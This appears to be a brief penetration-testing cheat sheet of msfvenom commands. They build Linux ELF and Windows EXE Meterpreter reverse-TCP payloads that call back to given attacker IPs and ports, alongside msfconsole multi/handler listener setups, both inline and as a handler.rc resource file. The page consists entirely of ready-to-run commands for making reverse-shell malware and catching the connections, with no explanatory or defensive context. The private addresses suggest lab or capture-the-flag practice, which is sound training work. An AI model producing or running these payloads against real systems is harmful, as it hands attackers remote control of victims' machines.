Skip to content

msfvenom

Meterpreter linux

shell.elf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f elf > shell.elf
online listener
msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost 10.10.14.24; set lport 4444; exploit"

Meterpreter windows

shell.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f exe > shell.exe
create handler.rc file
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.18.9.175
set LPORT 4444
run
run listener from file
msfconsole -r handler.rc

  • https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/